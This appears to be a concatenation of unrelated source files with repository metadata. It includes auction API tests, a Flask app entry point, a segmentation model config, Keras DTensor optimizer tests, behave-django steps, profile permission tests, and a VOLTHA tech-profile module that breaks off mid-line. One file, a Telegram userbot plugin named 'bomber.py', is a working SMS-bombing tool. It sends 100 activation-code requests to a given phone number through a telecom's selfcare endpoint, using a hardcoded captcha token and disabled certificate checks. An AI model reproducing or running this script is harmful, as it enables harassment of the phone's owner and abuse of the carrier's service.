owner_token = response.json['access']['token']
access_header = {'X-Access-Token': str(owner_token)}
# Move from draft to active.tendering
response = self.app.patch_json(
'/auctions/{}'.format(auction_id),
{'data': {'status': 'active.tendering'}},
headers=access_header
)
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['status'], 'active.tendering')
| 51.677072 | 205 | 0.661306 |
e930369d5416d6bf19a394dfa48251e9106724e2 | 315 | py | Python | xpense.py | jsbruglie/xpense | 95e4e4925e6fcf058520ab3fb149f8d9498d836f | [
"MIT"
] | 3 | 2020-08-12T08:48:20.000Z | 2020-09-08T09:34:30.000Z | xpense.py | jsbruglie/xpense | 95e4e4925e6fcf058520ab3fb149f8d9498d836f | [
"MIT"
] | null | null | null | xpense.py | jsbruglie/xpense | 95e4e4925e6fcf058520ab3fb149f8d9498d836f | [
"MIT"
] | null | null | null | from app import create_app, db
from app.models import Transaction, TransactionType, Account
app = create_app()
@app.shell_context_processor
def make_shell_context():
return {
'db': db,
'Transaction': Transaction,
'TransactionType': TransactionType,
'Account': Account,
}
| 19.6875 | 60 | 0.67619 |
49bd163ba33cbab16eb82032dc84915b63c47817 | 895 | py | Python | userbot/plugins/bomber.py | apurba007/ubot0 | 73344dc4dc9263db541f43146402958094962919 | [
"MIT"
] | null | null | null | userbot/plugins/bomber.py | apurba007/ubot0 | 73344dc4dc9263db541f43146402958094962919 | [
"MIT"
] | null | null | null | userbot/plugins/bomber.py | apurba007/ubot0 | 73344dc4dc9263db541f43146402958094962919 | [
"MIT"
] | null | null | null | """NTC Bomber custom plugin by @scifidemon
Format .bombntc [phone number]"""
import asyncio
import requests
from userbot.utils import admin_cmd
@borg.on(admin_cmd("bombntc (.*)"))
async def _(event):
num=0
n=100
input_str = event.pattern_match.group(1)
if input_str:
num = int(input_str)
else:
await event.edit("Enter a number!")
return
paramss={"webcaptcha":"2iBVFrLWrrezxoeI5u8duQpznGcudpxBQZM88Daf7ram7luqVkVKe8rsVxpM4nVunuNg7pGQ6Bb5jaUZdJnvkKXBn8nWBG890VRebIOsZM4%3D","JSESSIONID":"3854CCA90376DB14C75841F35A548032","2":"11","userName":num,"codeType":"1"}
await event.edit("`Bombing....`")
for i in range (n):
requests.post("https://selfcare.ntc.net.np/selfcare4web/user/sendActivityCode.do",params=paramss,verify=False)
await event.edit(f"`Bombing.... {i}`")
await event.edit(f"`Bombed {n} SMS to {num}`")
| 34.423077 | 226 | 0.694972 |
b9a4b3214ed9e21695e6ff96d50743f16e4eb98c | 2,189 | py | Python | ssseg/cfgs/apcnet/cfgs_cityscapes_resnet50os16.py | nianjiuhuiyi/sssegmentation | 4fc12ea7b80fe83170b6d3da0826e53a99ef5325 | [
"MIT"
] | 411 | 2020-10-22T02:24:57.000Z | 2022-03-31T11:19:17.000Z | ssseg/cfgs/apcnet/cfgs_cityscapes_resnet50os16.py | nianjiuhuiyi/sssegmentation | 4fc12ea7b80fe83170b6d3da0826e53a99ef5325 | [
"MIT"
] | 24 | 2020-12-21T03:53:54.000Z | 2022-03-17T06:50:00.000Z | ssseg/cfgs/apcnet/cfgs_cityscapes_resnet50os16.py | nianjiuhuiyi/sssegmentation | 4fc12ea7b80fe83170b6d3da0826e53a99ef5325 | [
"MIT"
] | 59 | 2020-12-04T03:40:12.000Z | 2022-03-30T09:12:47.000Z | '''define the config file for cityscapes and resnet50os16'''
import os
from .base_cfg import *
# modify dataset config
DATASET_CFG = DATASET_CFG.copy()
DATASET_CFG.update({
'type': 'cityscapes',
'rootdir': os.path.join(os.getcwd(), 'CityScapes'),
})
DATASET_CFG['train']['aug_opts'] = [
('Resize', {'output_size': (2048, 1024), 'keep_ratio': True, 'scale_range': (0.5, 2.0)}),
('RandomCrop', {'crop_size': (512, 1024), 'one_category_max_ratio': 0.75}),
('RandomFlip', {'flip_prob': 0.5}),
('PhotoMetricDistortion', {}),
('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
('ToTensor', {}),
('Padding', {'output_size': (512, 1024), 'data_type': 'tensor'}),
]
DATASET_CFG['test']['aug_opts'] = [
('Resize', {'output_size': (2048, 1024), 'keep_ratio': True, 'scale_range': None}),
('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
('ToTensor', {}),
]
# modify dataloader config
DATALOADER_CFG = DATALOADER_CFG.copy()
DATALOADER_CFG['train'].update(
{
'batch_size': 8,
}
)
# modify optimizer config
OPTIMIZER_CFG = OPTIMIZER_CFG.copy()
OPTIMIZER_CFG.update(
{
'max_epochs': 220
}
)
# modify losses config
LOSSES_CFG = LOSSES_CFG.copy()
# modify model config
MODEL_CFG = MODEL_CFG.copy()
MODEL_CFG.update(
{
'num_classes': 19,
'backbone': {
'type': 'resnet50',
'series': 'resnet',
'pretrained': True,
'outstride': 16,
'use_stem': True,
'selected_indices': (2, 3),
},
}
)
# modify inference config
INFERENCE_CFG = INFERENCE_CFG.copy()
# modify common config
COMMON_CFG = COMMON_CFG.copy()
COMMON_CFG['train'].update(
{
'backupdir': 'apcnet_resnet50os16_cityscapes_train',
'logfilepath': 'apcnet_resnet50os16_cityscapes_train/train.log',
}
)
COMMON_CFG['test'].update(
{
'backupdir': 'apcnet_resnet50os16_cityscapes_test',
'logfilepath': 'apcnet_resnet50os16_cityscapes_test/test.log',
'resultsavepath': 'apcnet_resnet50os16_cityscapes_test/apcnet_resnet50os16_cityscapes_results.pkl'
}
) | 29.986301 | 106 | 0.625857 |
20a05dfbde5452ca583c06d3e3e89645793744f8 | 4,337 | py | Python | keras/dtensor/optimizers_test.py | englert-m/keras | 7007cd0fd548032f1bb2c23b1defa4812628baec | [
"Apache-2.0"
] | null | null | null | keras/dtensor/optimizers_test.py | englert-m/keras | 7007cd0fd548032f1bb2c23b1defa4812628baec | [
"Apache-2.0"
] | null | null | null | keras/dtensor/optimizers_test.py | englert-m/keras | 7007cd0fd548032f1bb2c23b1defa4812628baec | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for initializers."""
from absl.testing import parameterized
from keras.dtensor import optimizers
import numpy as np
import tensorflow.compat.v2 as tf
from keras.dtensor.tests import test_util
from tensorflow.dtensor import python as dtensor # pylint: disable=g-direct-tensorflow-import
class OptimizersTest(test_util.DTensorBaseTest):
def setUp(self):
super(OptimizersTest, self).setUp()
global_ids = test_util.create_device_ids_array((2, 2))
local_device_ids = np.ravel(global_ids).tolist()
mesh_dict = {
'CPU':
dtensor.Mesh(['X', 'Y'], global_ids,
local_device_ids,
test_util.create_device_list((2, 2), 'CPU'))
}
self.mesh = self.configTestMesh(mesh_dict)
def test_add_variable_from_reference(self):
optimizer = optimizers.Adam(mesh=self.mesh)
variable_init_value = tf.ones(
[4, 4], dtype=tf.float32,
layout=dtensor.Layout.replicated(self.mesh, rank=2))
model_variable = dtensor.DVariable(variable_init_value,
trainable=True,
name='tmp')
state_variable = optimizer.add_variable_from_reference(
model_variable, 'test')
self.assertEqual(state_variable._shared_name, 'test/tmp')
self.assertAllClose(self.evaluate(state_variable), tf.zeros([4, 4]))
# Make sure the variable contains the correct layout info
self.assertEqual(state_variable.layout, model_variable.layout)
def test_build_index_dict(self):
optimizer = optimizers.Adam(mesh=self.mesh)
variable_init_value = tf.ones(
shape=(), dtype=tf.float32,
layout=dtensor.Layout.replicated(self.mesh, rank=0))
var_list = [dtensor.DVariable(variable_init_value, name=f'var{i}')
for i in range(10)]
optimizer._build_index_dict(var_list)
self.assertEqual(optimizer._index_dict[optimizer._var_key(var_list[7])], 7)
@parameterized.named_parameters(
('Adadelta', optimizers.Adadelta, {},
['Adadelta/accumulated_grad/Variable',
'Adadelta/accumulated_delta_var/Variable']),
('Adam', optimizers.Adam, {'amsgrad': True},
['Adam/m/Variable', 'Adam/v/Variable', 'Adam/vhat/Variable']),
('Adagrad', optimizers.Adagrad, {}, ['Adagrad/accumulator/Variable']),
('RMSprop', optimizers.RMSprop, {'momentum': 0.1, 'centered': True},
['RMSprop/velocity/Variable', 'RMSprop/momentum/Variable',
'RMSprop/average_gradient/Variable']),
('SGD', optimizers.SGD, {'momentum': 0.1}, ['SGD/m/Variable'])
)
def test_apply_gradients(self, optimizer_cls, init_args,
expect_variable_names):
optimizer = optimizer_cls(mesh=self.mesh, **init_args)
self.assertEqual(self.evaluate(optimizer.iterations), 0)
self.assertEqual(optimizer.iterations.layout,
dtensor.Layout.replicated(self.mesh, rank=0))
variable_init_value = tf.ones(
[4, 4], dtype=tf.float32,
layout=dtensor.Layout.replicated(self.mesh, rank=2))
model_variable = dtensor.DVariable(variable_init_value,
trainable=True)
grads = tf.ones_like(variable_init_value)
optimizer.apply_gradients(zip([grads], [model_variable]))
optimizer_variables = optimizer.variables
self.assertEqual(self.evaluate(optimizer.iterations), 1)
all_names = [var._shared_name for var in optimizer_variables]
expect_variable_names.extend(['iteration', 'learning_rate'])
self.assertCountEqual(all_names, expect_variable_names)
if __name__ == '__main__':
tf.test.main()
| 41.701923 | 94 | 0.675582 |
5251476464b5ad56fb18ed56656c4e158c31ac51 | 2,026 | py | Python | features/steps/context-urlhelper.py | richardARPANET/behave-django | 10d401c3a9619d176e683b439ccac8b97f2f3e34 | [
"MIT"
] | null | null | null | features/steps/context-urlhelper.py | richardARPANET/behave-django | 10d401c3a9619d176e683b439ccac8b97f2f3e34 | [
"MIT"
] | null | null | null | features/steps/context-urlhelper.py | richardARPANET/behave-django | 10d401c3a9619d176e683b439ccac8b97f2f3e34 | [
"MIT"
] | null | null | null | from behave import when, then
from django.core.urlresolvers import reverse
from test_app.models import BehaveTestModel
@when(u'I call get_url() without arguments')
def without_args(context):
context.result = context.get_url()
@when(u'I call get_url("{url_path}") with an absolute path')
def path_arg(context, url_path):
context.result = context.get_url(url_path)
@when(u'I call get_url("{view_name}") with a view name')
def view_arg(context, view_name):
context.result = context.get_url(view_name)
@when(u'I call get_url(model) with a model instance')
def model_arg(context):
context.model = BehaveTestModel(name='Foo', number=3)
context.result = context.get_url(context.model)
@then(u'it returns the value of base_url')
def is_baseurl_value(context):
context.test.assertEquals(context.result, context.base_url)
@then(u'the result is the base_url with "{url_path}" appended')
def baseurl_plus_path(context, url_path):
context.test.assertEquals(context.result, context.base_url + url_path)
@then(u'the result is the base_url with reverse("{view_name}") appended')
def baseurl_plus_reverse(context, view_name):
path = reverse(view_name)
assert len(path) > 0, "Non-empty path expected"
context.test.assertEquals(context.result, context.base_url + path)
@then(u'the result is the base_url with model.get_absolute_url() appended')
def baseurl_plus_absolute_url(context):
path = context.model.get_absolute_url()
assert len(path) > 0, "Non-empty path expected"
context.test.assertEquals(context.result, context.base_url + path)
@then(u'this returns the same result as get_url(reverse("{view_name}"))')
def explicit_reverse(context, view_name):
path = reverse(view_name)
context.test.assertEquals(context.result, context.get_url(path))
@then(u'this returns the same result as get_url(model.get_absolute_url())')
def get_model_url(context):
path = context.model.get_absolute_url()
context.test.assertEquals(context.result, context.get_url(path))
| 32.677419 | 75 | 0.754689 |
f9daacec56dd26de5d9b2e90fbbc88933e922b65 | 549 | py | Python | apigateway/mission/resources.py | automation-liberation/api-gateway | 6c10f6a772ab578740e99a365e6b97e7761c5127 | [
"Apache-2.0"
] | null | null | null | apigateway/mission/resources.py | automation-liberation/api-gateway | 6c10f6a772ab578740e99a365e6b97e7761c5127 | [
"Apache-2.0"
] | null | null | null | apigateway/mission/resources.py | automation-liberation/api-gateway | 6c10f6a772ab578740e99a365e6b97e7761c5127 | [
"Apache-2.0"
] | null | null | null | from flask import request
from flask_restful import Resource
from apigateway.celery import celery
class StartMission(Resource):
def get(self, mission_id):
celery.send_task('missioncontrol.mission.start', (mission_id,))
return {"msg": f"Mission started"}
class CreateMission(Resource):
def post(self):
return celery.send_task('missioncontrol.mission.create', (request.json,)).get()
class Missions(Resource):
def get(self):
return celery.send_task('missioncontrol.mission.get_all_missions').get()
| 22.875 | 87 | 0.721311 |
a539bb1f6ea807c748d672576d0f5b9d31b2d1cf | 3,963 | py | Python | profiles/permissions_test.py | mitodl/open-discussions | ab6e9fac70b8a1222a84e78ba778a7a065c20541 | [
"BSD-3-Clause"
] | 12 | 2017-09-27T21:23:27.000Z | 2020-12-25T04:31:30.000Z | profiles/permissions_test.py | mitodl/open-discussions | ab6e9fac70b8a1222a84e78ba778a7a065c20541 | [
"BSD-3-Clause"
] | 3,293 | 2017-06-30T18:16:01.000Z | 2022-03-31T18:01:34.000Z | profiles/permissions_test.py | mitodl/open-discussions | ab6e9fac70b8a1222a84e78ba778a7a065c20541 | [
"BSD-3-Clause"
] | 1 | 2020-04-13T12:19:57.000Z | 2020-04-13T12:19:57.000Z | # pylint: disable=too-many-arguments,redefined-outer-name
""" Tests for profile permissions """
import pytest
from open_discussions.factories import UserFactory
from profiles.permissions import (
HasEditPermission,
HasSiteEditPermission,
is_owner_or_privileged_user,
)
lazy = pytest.lazy_fixture
@pytest.fixture
def user1():
"""Simple test user fixture"""
return UserFactory.build()
@pytest.fixture
def user2():
"""Another simple test user fixture"""
return UserFactory.build()
@pytest.mark.parametrize(
"object_user,request_user,is_super,is_staff,exp_result",
[
(lazy("user1"), lazy("user2"), False, False, False),
(lazy("user1"), lazy("user1"), False, False, True),
(lazy("user1"), lazy("user2"), True, False, True),
(lazy("user1"), lazy("user2"), False, True, True),
],
)
def test_is_owner_or_privileged_user(
mocker, object_user, request_user, is_super, is_staff, exp_result
):
"""
Test that is_owner_or_privileged_user returns True if the object user and request user match, or if the
request user is a superuser/staff
"""
request_user.is_superuser = is_super
request_user.is_staff = is_staff
request = mocker.Mock(user=request_user)
assert is_owner_or_privileged_user(object_user, request) is exp_result
def test_can_edit_profile_staff(mocker, staff_user):
"""
Test that staff users are allowed to view/edit profiles
"""
request = mocker.Mock(user=staff_user)
profile = staff_user.profile
assert HasEditPermission().has_permission(request, mocker.Mock()) is True
assert (
HasEditPermission().has_object_permission(request, mocker.Mock(), profile)
is True
)
@pytest.mark.parametrize(
"method,result",
[("GET", True), ("HEAD", True), ("OPTIONS", True), ("POST", False), ("PUT", False)],
)
@pytest.mark.parametrize("is_super", [True, False])
def test_can_edit_other_profile(mocker, method, result, user, is_super):
"""
Test that non-staff users are not allowed to edit another user's profile
"""
request = mocker.Mock(user=user, method=method)
profile = UserFactory.create(is_superuser=is_super).profile
assert (
HasEditPermission().has_object_permission(request, mocker.Mock(), profile)
is result
or is_super
)
@pytest.mark.parametrize("method", ["GET", "HEAD", "OPTIONS", "POST", "PUT"])
def test_can_edit_own_profile(mocker, method, user):
"""
Test that users are allowed to edit their own profile
"""
request = mocker.Mock(user=user, method=method)
profile = user.profile
assert (
HasEditPermission().has_object_permission(request, mocker.Mock(), profile)
is True
)
@pytest.mark.parametrize("method", ["GET", "HEAD", "OPTIONS"])
def test_site_edit_permission_safe(mocker, method):
"""Test that safe methods are always allowed by HasSiteEditPermission"""
request = mocker.Mock(user=UserFactory.build(), method=method)
assert (
HasSiteEditPermission().has_object_permission(
request, view=mocker.Mock(), obj=mocker.Mock()
)
is True
)
@pytest.mark.parametrize(
"permission_check_ret_val,exp_result", [(True, True), (False, False)]
)
@pytest.mark.parametrize("method", ["POST", "PUT"])
def test_site_edit_permission(mocker, method, permission_check_ret_val, exp_result):
"""Test that HasSiteEditPermission returns True if the permission helper function returns True"""
request = mocker.Mock(user=mocker.Mock(), method=method)
patched_permission_func = mocker.patch(
"profiles.permissions.is_owner_or_privileged_user",
return_value=permission_check_ret_val,
)
assert (
HasSiteEditPermission().has_object_permission(
request, view=mocker.Mock(), obj=mocker.Mock(profile=request.user)
)
is exp_result
)
patched_permission_func.assert_called_once()
| 31.959677 | 107 | 0.693162 |
162b476d31421d55f69586e39c3337113a1a15cc | 26,236 | py | Python | pyvoltha/common/tech_profile/tech_profile.py | nsharma70/pyvoltha | ea01eb85f45e3cd0bed12b4b446e5af7f66c16db | [
"Apache-2.0"
] | null | null | null | pyvoltha/common/tech_profile/tech_profile.py | nsharma70/pyvoltha | ea01eb85f45e3cd0bed12b4b446e5af7f66c16db | [
"Apache-2.0"
] | 1 | 2021-03-25T23:34:15.000Z | 2021-03-25T23:34:15.000Z | pyvoltha/common/tech_profile/tech_profile.py | rohan-agra/VOL-2311-pyvoltha | 54ac9266cf4fc27a7583ba08ada779ad107e9cfe | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2018 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import json
import ast
from collections import namedtuple
import structlog
from enum import Enum
from pyvoltha.common.config.config_backend import ConsulStore
from pyvoltha.common.config.config_backend import EtcdStore
from pyvoltha.common.utils.registry import registry
from voltha_protos import openolt_pb2
from six.moves import range
# logger
log = structlog.get_logger()
DEFAULT_TECH_PROFILE_TABLE_ID = 64
# Enums used while creating TechProfileInstance
Direction = Enum('Direction', ['UPSTREAM', 'DOWNSTREAM', 'BIDIRECTIONAL'],
start=0)
SchedulingPolicy = Enum('SchedulingPolicy',
['WRR', 'StrictPriority', 'Hybrid'], start=0)
AdditionalBW = Enum('AdditionalBW', ['None', 'NA', 'BestEffort', 'Auto'],
start=0)
DiscardPolicy = Enum('DiscardPolicy',
['TailDrop', 'WTailDrop', 'RED', 'WRED'], start=0)
InferredAdditionBWIndication = Enum('InferredAdditionBWIndication',
['None', 'NoneAssured', 'BestEffort'],
start=0)
class InstanceControl(object):
# Default value constants
ONU_DEFAULT_INSTANCE = 'multi-instance'
UNI_DEFAULT_INSTANCE = 'single-instance'
DEFAULT_NUM_GEM_PORTS = 1
DEFAULT_GEM_PAYLOAD_SIZE = 'auto'
def __init__(self, onu=ONU_DEFAULT_INSTANCE,
uni=UNI_DEFAULT_INSTANCE,
num_gem_ports=DEFAULT_NUM_GEM_PORTS,
max_gem_payload_size=DEFAULT_GEM_PAYLOAD_SIZE):
self.onu = onu
self.uni = uni
self.num_gem_ports = num_gem_ports
self.max_gem_payload_size = max_gem_payload_size
class Scheduler(object):
# Default value constants
DEFAULT_ADDITIONAL_BW = 'auto'
DEFAULT_PRIORITY = 0
DEFAULT_WEIGHT = 0
DEFAULT_Q_SCHED_POLICY = 'hybrid'
def __init__(self, direction, additional_bw=DEFAULT_ADDITIONAL_BW,
priority=DEFAULT_PRIORITY,
weight=DEFAULT_WEIGHT,
q_sched_policy=DEFAULT_Q_SCHED_POLICY):
self.direction = direction
self.additional_bw = additional_bw
self.priority = priority
self.weight = weight
self.q_sched_policy = q_sched_policy
class GemPortAttribute(object):
# Default value constants
DEFAULT_AES_ENCRYPTION = 'True'
DEFAULT_PRIORITY_Q = 0
DEFAULT_WEIGHT = 0
DEFAULT_MAX_Q_SIZE = 'auto'
DEFAULT_DISCARD_POLICY = DiscardPolicy.TailDrop.name
def __init__(self, pbit_map, discard_config,
aes_encryption=DEFAULT_AES_ENCRYPTION,
scheduling_policy=SchedulingPolicy.WRR.name,
priority_q=DEFAULT_PRIORITY_Q,
weight=DEFAULT_WEIGHT,
max_q_size=DEFAULT_MAX_Q_SIZE,
discard_policy=DiscardPolicy.TailDrop.name):
self.max_q_size = max_q_size
self.pbit_map = pbit_map
self.aes_encryption = aes_encryption
self.scheduling_policy = scheduling_policy
self.priority_q = priority_q
self.weight = weight
self.discard_policy = discard_policy
self.discard_config = discard_config
class DiscardConfig(object):
# Default value constants
DEFAULT_MIN_THRESHOLD = 0
DEFAULT_MAX_THRESHOLD = 0
DEFAULT_MAX_PROBABILITY = 0
def __init__(self, min_threshold=DEFAULT_MIN_THRESHOLD,
max_threshold=DEFAULT_MAX_THRESHOLD,
max_probability=DEFAULT_MAX_PROBABILITY):
self.min_threshold = min_threshold
self.max_threshold = max_threshold
self.max_probability = max_probability
class TechProfile(object):
# Constants used in default tech profile
DEFAULT_TECH_PROFILE_NAME = 'Default_1tcont_1gem_Profile'
DEFAULT_VERSION = 1.0
DEFAULT_GEMPORTS_COUNT = 1
pbits = ['0b11111111']
# Tech profile path prefix in kv store
KV_STORE_TECH_PROFILE_PATH_PREFIX = 'service/voltha/technology_profiles'
# Tech profile path in kv store
TECH_PROFILE_PATH = '{}/{}' # <technology>/<table_id>
# Tech profile instance path in kv store
# Format: <technology>/<table_id>/<uni_port_name>
TECH_PROFILE_INSTANCE_PATH = '{}/{}/{}'
# Tech-Profile JSON String Keys
NAME = 'name'
PROFILE_TYPE = 'profile_type'
VERSION = 'version'
NUM_GEM_PORTS = 'num_gem_ports'
INSTANCE_CONTROL = 'instance_control'
US_SCHEDULER = 'us_scheduler'
DS_SCHEDULER = 'ds_scheduler'
UPSTREAM_GEM_PORT_ATTRIBUTE_LIST = 'upstream_gem_port_attribute_list'
DOWNSTREAM_GEM_PORT_ATTRIBUTE_LIST = 'downstream_gem_port_attribute_list'
ONU = 'onu'
UNI = 'uni'
MAX_GEM_PAYLOAD_SIZE = 'max_gem_payload_size'
DIRECTION = 'direction'
ADDITIONAL_BW = 'additional_bw'
PRIORITY = 'priority'
Q_SCHED_POLICY = 'q_sched_policy'
WEIGHT = 'weight'
PBIT_MAP = 'pbit_map'
DISCARD_CONFIG = 'discard_config'
MAX_THRESHOLD = 'max_threshold'
MIN_THRESHOLD = 'min_threshold'
MAX_PROBABILITY = 'max_probability'
DISCARD_POLICY = 'discard_policy'
PRIORITY_Q = 'priority_q'
SCHEDULING_POLICY = 'scheduling_policy'
MAX_Q_SIZE = 'max_q_size'
AES_ENCRYPTION = 'aes_encryption'
def __init__(self, resource_mgr):
try:
self.args = registry('main').get_args()
self.resource_mgr = resource_mgr
if self.args.backend == 'etcd':
# KV store's IP Address and PORT
host, port = self.args.etcd.split(':', 1)
self._kv_store = EtcdStore(
host, port, TechProfile.
KV_STORE_TECH_PROFILE_PATH_PREFIX)
elif self.args.backend == 'consul':
# KV store's IP Address and PORT
host, port = self.args.consul.split(':', 1)
self._kv_store = ConsulStore(
host, port, TechProfile.
KV_STORE_TECH_PROFILE_PATH_PREFIX)
# self.tech_profile_instance_store = dict()
except Exception as e:
log.exception("exception-in-init")
raise Exception(e)
class DefaultTechProfile(object):
def __init__(self, name, **kwargs):
self.name = name
self.profile_type = kwargs[TechProfile.PROFILE_TYPE]
self.version = kwargs[TechProfile.VERSION]
self.num_gem_ports = kwargs[TechProfile.NUM_GEM_PORTS]
self.instance_control = kwargs[TechProfile.INSTANCE_CONTROL]
self.us_scheduler = kwargs[TechProfile.US_SCHEDULER]
self.ds_scheduler = kwargs[TechProfile.DS_SCHEDULER]
self.upstream_gem_port_attribute_list = kwargs[
TechProfile.UPSTREAM_GEM_PORT_ATTRIBUTE_LIST]
self.downstream_gem_port_attribute_list = kwargs[
TechProfile.DOWNSTREAM_GEM_PORT_ATTRIBUTE_LIST]
def to_json(self):
return json.dumps(self, default=lambda o: o.__dict__,
indent=4)
def get_tp_path(self, table_id, uni_port_name):
path = TechProfile.TECH_PROFILE_INSTANCE_PATH.format(
self.resource_mgr.technology, table_id, uni_port_name)
log.debug("constructed-tp-path", table_id=table_id, technology=self.resource_mgr.technology,
uni_port_name=uni_port_name, path=path)
return path
def create_tech_profile_instance(self, table_id, uni_port_name, intf_id):
tech_profile_instance = None
try:
# Get tech profile from kv store
tech_profile = self._get_tech_profile_from_kv_store(table_id)
path = self.get_tp_path(table_id, uni_port_name)
if tech_profile is not None:
tech_profile = self._get_tech_profile(tech_profile)
log.debug(
"Created-tech-profile-instance-with-values-from-kvstore")
else:
tech_profile = self._default_tech_profile()
log.debug(
"Created-tech-profile-instance-with-default-values")
tech_profile_instance = TechProfileInstance(
uni_port_name, tech_profile, self.resource_mgr, intf_id)
self._add_tech_profile_instance(path,
tech_profile_instance.to_json())
except Exception as e:
log.exception("Create-tech-profile-instance-failed", exception=e)
return tech_profile_instance
def get_tech_profile_instance(self, table_id, uni_port_name):
# path to fetch tech profile instance json from kv store
path = TechProfile.TECH_PROFILE_INSTANCE_PATH.format(
self.resource_mgr.technology, table_id, uni_port_name)
try:
tech_profile_instance = self._kv_store[path]
log.debug("Tech-profile-instance-present-in-kvstore", path=path,
tech_profile_instance=tech_profile_instance)
# Parse JSON into an object with attributes corresponding to dict keys.
tech_profile_instance = json.loads(tech_profile_instance,
object_hook=lambda d:
namedtuple('tech_profile_instance',
list(d.keys()))(*list(d.values())))
log.debug("Tech-profile-instance-after-json-to-object-conversion", path=path,
tech_profile_instance=tech_profile_instance)
return tech_profile_instance
except BaseException as e:
log.debug("Tech-profile-instance-not-present-in-kvstore",
path=path, tech_profile_instance=None, exception=e)
return None
def delete_tech_profile_instance(self, tp_path):
try:
del self._kv_store[tp_path]
log.debug("Delete-tech-profile-instance-success", path=tp_path)
return True
except Exception as e:
log.debug("Delete-tech-profile-instance-failed", path=tp_path,
exception=e)
return False
def _get_tech_profile_from_kv_store(self, table_id):
"""
Get tech profile from kv store.
:param table_id: reference to get tech profile
:return: tech profile if present in kv store else None
"""
# get tech profile from kv store
path = TechProfile.TECH_PROFILE_PATH.format(self.resource_mgr.technology,
table_id)
try:
tech_profile = self._kv_store[path]
if tech_profile != '':
log.debug("Get-tech-profile-success", tech_profile=tech_profile)
return json.loads(tech_profile)
# return ast.literal_eval(tech_profile)
except KeyError as e:
log.info("Get-tech-profile-failed", exception=e)
return None
def _default_tech_profile(self):
# Default tech profile
upstream_gem_port_attribute_list = list()
downstream_gem_port_attribute_list = list()
for pbit in TechProfile.pbits:
upstream_gem_port_attribute_list.append(
GemPortAttribute(pbit_map=pbit,
discard_config=DiscardConfig()))
downstream_gem_port_attribute_list.append(
GemPortAttribute(pbit_map=pbit,
discard_config=DiscardConfig()))
return TechProfile.DefaultTechProfile(
TechProfile.DEFAULT_TECH_PROFILE_NAME,
profile_type=self.resource_mgr.technology,
version=TechProfile.DEFAULT_VERSION,
num_gem_ports=TechProfile.DEFAULT_GEMPORTS_COUNT,
instance_control=InstanceControl(),
us_scheduler=Scheduler(direction=Direction.UPSTREAM.name),
ds_scheduler=Scheduler(direction=Direction.DOWNSTREAM.name),
upstream_gem_port_attribute_list=upstream_gem_port_attribute_list,
downstream_gem_port_attribute_list=
downstream_gem_port_attribute_list)
@staticmethod
def _get_tech_profile(tech_profile):
# Tech profile fetched from kv store
instance_control = tech_profile[TechProfile.INSTANCE_CONTROL]
instance_control = InstanceControl(
onu=instance_control[TechProfile.ONU],
uni=instance_control[TechProfile.UNI],
max_gem_payload_size=instance_control[
TechProfile.MAX_GEM_PAYLOAD_SIZE])
us_scheduler = tech_profile[TechProfile.US_SCHEDULER]
us_scheduler = Scheduler(direction=us_scheduler[TechProfile.DIRECTION],
additional_bw=us_scheduler[
TechProfile.ADDITIONAL_BW],
priority=us_scheduler[TechProfile.PRIORITY],
weight=us_scheduler[TechProfile.WEIGHT],
q_sched_policy=us_scheduler[
TechProfile.Q_SCHED_POLICY])
ds_scheduler = tech_profile[TechProfile.DS_SCHEDULER]
ds_scheduler = Scheduler(direction=ds_scheduler[TechProfile.DIRECTION],
additional_bw=ds_scheduler[
TechProfile.ADDITIONAL_BW],
priority=ds_scheduler[TechProfile.PRIORITY],
weight=ds_scheduler[TechProfile.WEIGHT],
q_sched_policy=ds_scheduler[
TechProfile.Q_SCHED_POLICY])
upstream_gem_port_attribute_list = list()
downstream_gem_port_attribute_list = list()
us_gemport_attr_list = tech_profile[
TechProfile.UPSTREAM_GEM_PORT_ATTRIBUTE_LIST]
for i in range(len(us_gemport_attr_list)):
upstream_gem_port_attribute_list.append(
GemPortAttribute(pbit_map=us_gemport_attr_list[i][TechProfile.PBIT_MAP],
discard_config=DiscardConfig(
max_threshold=
us_gemport_attr_list[i][TechProfile.DISCARD_CONFIG][
TechProfile.MAX_THRESHOLD],
min_threshold=
us_gemport_attr_list[i][TechProfile.DISCARD_CONFIG][
TechProfile.MIN_THRESHOLD],
max_probability=
us_gemport_attr_list[i][TechProfile.DISCARD_CONFIG][
TechProfile.MAX_PROBABILITY]),
discard_policy=us_gemport_attr_list[i][
TechProfile.DISCARD_POLICY],
priority_q=us_gemport_attr_list[i][
TechProfile.PRIORITY_Q],
weight=us_gemport_attr_list[i][TechProfile.WEIGHT],
scheduling_policy=us_gemport_attr_list[i][
TechProfile.SCHEDULING_POLICY],
max_q_size=us_gemport_attr_list[i][
TechProfile.MAX_Q_SIZE],
aes_encryption=us_gemport_attr_list[i][
TechProfile.AES_ENCRYPTION]))
ds_gemport_attr_list = tech_profile[
TechProfile.DOWNSTREAM_GEM_PORT_ATTRIBUTE_LIST]
for i in range(len(ds_gemport_attr_list)):
downstream_gem_port_attribute_list.append(
GemPortAttribute(pbit_map=ds_gemport_attr_list[i][TechProfile.PBIT_MAP],
discard_config=DiscardConfig(
max_threshold=
ds_gemport_attr_list[i][TechProfile.DISCARD_CONFIG][
TechProfile.MAX_THRESHOLD],
min_threshold=
ds_gemport_attr_list[i][TechProfile.DISCARD_CONFIG][
TechProfile.MIN_THRESHOLD],
max_probability=
ds_gemport_attr_list[i][TechProfile.DISCARD_CONFIG][
